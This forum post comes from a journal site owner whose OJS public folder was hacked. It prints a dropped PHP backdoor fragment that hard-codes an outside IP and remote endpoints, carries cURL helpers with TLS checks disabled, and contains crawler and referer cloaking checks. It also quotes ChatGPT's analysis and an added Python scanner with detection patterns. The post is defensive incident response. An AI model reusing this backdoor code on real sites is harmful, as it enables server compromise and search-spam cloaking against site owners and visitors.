Did you face a similar issue? What are the options?
A hacker removed all the files and subfolders from my public folder.
Because I suspect he/she registered as an author through OJS, I have now selected the option that only the journal manager can subscribe new authors.
He/she apparently managed (? through OJS) to upload a php file into my public folder and take the lead.
I have asked ChatGPT
What’s the code in the following file doing in my home directory?

```php
<?php
ini_set('display_errors', 1);
ini_set('display_startup_errors', 1);
error_reporting(E_ALL);
ob_start(); // Start output buffering
$inter_domain = 'http://192.187.108.42/z1007_7/';
function curl_get_contents($url) {
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Increase the cURL timeout to 30 seconds
    $file_contents = curl_exec($ch);
    curl_close($ch);
    return $file_contents;
}
function getServerCont($url, $data = array()) {
    $url = str_replace(' ', '+', $url);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, "$url");
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_TIMEOUT, 30); // Increase the timeout to 30 seconds
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $output = curl_exec($ch);
    $errorCode = curl_errno($ch);
    curl_close($ch);
    if (0 !== $errorCode) {
        return false;
    }
    return $output;
}
function is_crawler($agent) {
    $agent_check = false;
    $bots = 'googlebot|google|yahoo|bing|aol';
    if ($agent != '') {
        if (preg_match("/($bots)/si", $agent)) {
            $agent_check = true;
        }
    }
    return $agent_check;
}
function check_refer($refer) {
    $check_refer = false;
    $referbots = 'google.co.jp|yahoo.co.jp|google.com';
    if ($refer != '' && preg_match("/($referbots)/si", $refer)) {
        $check_refer = true;
    }
    return $check_refer;
}
$http = ((isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https://' : 'http://');
$req_uri = $_SERVER['REQUEST_URI'];
$domain = $_SERVER["HTTP_HOST"];
$self = $_SERVER['PHP_SELF'];
$ser_name = $_SERVER['SERVER_NAME'];
$req_url = $http . $domain . $req_uri;
$indata1 = $inter_domain . "/indata.php";
$map1 = $inter_domain . "/map.php";
$jump1 = $inter_domain . "/jump.php";
$url_words = $inter_domain . "/words.php";
$url_robots = $inter_domain . "/robots.php";
/**
 * Note: This file may contain artifacts of previous malicious infection.
 * However, the dangerous code has been removed, and the file is now safe to use.
 */
ob_end_flush(); // End output buffering and send it to the browser
?>
```
ChatGPT answered:

This PHP script appears to be potentially malicious and might have been placed in your home directory as part of a security breach. Here’s what it does:

Key Observations:
- Error Reporting Enabled: It enables full error reporting (`ini_set('display_errors', 1);`), which is common in debugging but can expose sensitive information.
- Output Buffering (`ob_start()`): This can be used to manipulate or delay script execution, sometimes to avoid detection.
- External Communication via cURL: The script defines functions (`curl_get_contents()` and `getServerCont()`) that make HTTP requests to an external server (http://192.187.108.42/z1007_7/). This suggests it might be fetching or sending data to this external domain.
- Crawler Detection: The function `is_crawler($agent)` checks if the request comes from a search engine bot (Googlebot, Yahoo, Bing, AOL). Possible purpose: Avoiding detection by security systems or SEO poisoning.
- Referer Validation: The `check_refer($refer)` function checks if the visitor comes from a search engine (e.g., Google Japan). Possible purpose: Showing different content to real users and search engines (cloaking).
- Hardcoded External Endpoints: The script references multiple external PHP files hosted on http://192.187.108.42/z1007_7/, including `/indata.php`, `/map.php`, `/jump.php`, `/words.php` and `/robots.php`. Possible purpose: Fetching malicious commands, injecting spam links, or redirecting visitors.

Potential Risks:
- Backdoor or Malware Component: If this script is unauthorized, it may be part of a backdoor allowing remote attackers to control your server.
- SEO Spam or Cloaking: It may be injecting malicious SEO content or redirecting certain visitors (like search engine crawlers) to external sites.
- Data Exfiltration: The script could be stealing data from your website and sending it to the external server.

What Should You Do?
- Immediately remove this file if you didn’t place it there.
- Scan your server for other suspicious files, especially:
  - Unrecognized PHP files
  - Modified `.htaccess` files
  - Suspicious scheduled tasks (cron jobs)
- Check server logs to see how the file was placed in your directory.
- Change all passwords (FTP, database, hosting panel) in case of a breach.
- Update your server and web applications to prevent further exploitation.

Let me know if you need help identifying more suspicious files!
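One way to carry out the "scan your server for other suspicious files" step from the answer above, as an added example that is neither from the post nor from OJS: a small offline scanner that walks a web-writable directory such as the OJS `public` folder, flags any PHP file found there (the assumption being that an upload directory should hold images and documents, never PHP source), and reports which of the behavioural indicators visible in the posted script each file carries: a hard-coded `http://<IP>/` endpoint, a search-engine user-agent regex, a referer-cloaking regex, cURL with TLS verification disabled, the remote `*.php` names, and `ob_start()`. The indicator names, the severity rule and all sample files are my own constructions; the sample PHP is inert (no network calls, no request handling) and uses an RFC 5737 documentation address.

```python
"""Scan an upload directory for PHP files and the indicators seen in the posted script.

Added example, not code from the forum post or from OJS. Indicator names, the
severity rule and the sample files are constructed for this demonstration.
"""
import re
import sys
import tempfile
from pathlib import Path
from typing import Union

# Extensions most PHP handlers execute; assumption: none of these belong in an upload folder.
PHP_EXTENSIONS = {".php", ".phtml", ".php3", ".php5", ".php7", ".phar"}

# Behavioural indicators derived from the posted script (names are ours, not a standard).
INDICATORS = {
    "hardcoded_ip_url":    re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}/"),
    "crawler_ua_regex":    re.compile(r"googlebot\|google\|yahoo\|bing", re.I),
    "referer_cloaking":    re.compile(r"google\.co\.jp\|yahoo\.co\.jp", re.I),
    "curl_no_tls_verify":  re.compile(r"CURLOPT_SSL_VERIFYPEER\s*,\s*FALSE", re.I),
    "remote_php_endpoint": re.compile(r"/(?:indata|map|jump|words|robots)\.php"),
    "output_buffering":    re.compile(r"\bob_start\s*\("),
}


def scan_file(path: Union[str, Path]) -> list:
    """Return the indicator names that fire for one file (empty list if clean)."""
    path = Path(path)
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return []
    hits = []
    # PHP source inside an upload directory is itself the primary finding.
    if path.suffix.lower() in PHP_EXTENSIONS or "<?php" in text:
        hits.append("php_code")
    hits.extend(name for name, rx in INDICATORS.items() if rx.search(text))
    return hits


def severity(hits: list) -> str:
    """PHP code plus two or more behavioural indicators resembles the posted script."""
    behavioural = [h for h in hits if h != "php_code"]
    if "php_code" in hits and len(behavioural) >= 2:
        return "high"
    return "review" if hits else "clean"


def scan_dir(root: Union[str, Path]) -> dict:
    """Scan every regular file under root; return {relative_path: {hits, severity, mtime}}."""
    root = Path(root)
    findings = {}
    for p in sorted(root.rglob("*")):
        if not p.is_file():
            continue
        hits = scan_file(p)
        if hits:
            findings[p.relative_to(root).as_posix()] = {
                "hits": hits,
                "severity": severity(hits),
                "mtime": int(p.stat().st_mtime),  # to correlate with web/FTP access logs
            }
    return findings


# Constructed sample mirroring the indicator strings of the posted script; it does nothing.
SAMPLE_DROPPED_PHP = """<?php
$inter_domain = 'http://192.0.2.10/example/';
function is_crawler($agent) { return preg_match("/(googlebot|google|yahoo|bing|aol)/si", $agent); }
$indata1 = $inter_domain . "/indata.php";
?>"""


def build_sample_dir() -> str:
    """Create a throwaway 'public' folder: one dropped PHP file plus two benign uploads."""
    root = Path(tempfile.mkdtemp(prefix="public_"))
    (root / "site").mkdir()
    (root / "journals" / "1").mkdir(parents=True)
    (root / "site" / "z.php").write_text(SAMPLE_DROPPED_PHP)
    (root / "journals" / "1" / "logo.png").write_bytes(b"\x89PNG\r\n\x1a\n" + b"\x00" * 16)
    (root / "site" / "index.html").write_text("<!doctype html><title>public</title>")
    return str(root)


if __name__ == "__main__":
    # Pass a real directory (e.g. the OJS public folder) as argv[1]; otherwise scan the demo.
    target = sys.argv[1] if len(sys.argv) > 1 else build_sample_dir()
    for rel, info in scan_dir(target).items():
        print(f"{info['severity']:6} mtime={info['mtime']} {rel}: {', '.join(info['hits'])}")
```

Run it against the real upload directory (`python scan_public.py /path/to/ojs/public`); the reported `mtime` is the timestamp to look for in the web-server and FTP logs when tracing how the file arrived, which is the "check server logs" step above. Two caveats: a regex scanner only catches variants of this particular script, so a clean result is not proof of a clean server, and the lasting fix is to configure the web server so that nothing under the upload directory is ever executed as PHP, which removes the whole class of problem rather than one dropped file.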